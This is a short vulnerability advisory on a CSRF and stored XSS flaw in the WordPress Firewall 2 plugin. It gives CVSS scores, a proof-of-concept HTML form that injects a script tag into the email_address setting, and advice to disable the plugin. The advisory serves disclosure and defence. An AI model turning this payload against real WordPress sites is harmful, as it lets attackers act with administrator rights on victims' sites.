CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can

Score Vector Complexity Authentication Confidentiality Integrity Availability
Network Medium None Partial Partial None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.


HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.

Proof of concept

Visit the following page, click on the submit button, then visit the plugin’s options page:

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
  <input type="text" name="email_address" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="set_email" value="Set Email">
  <input type="submit">

In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.

Mitigation/further actions

Disable the plugin until a new version is released that fixes this bug.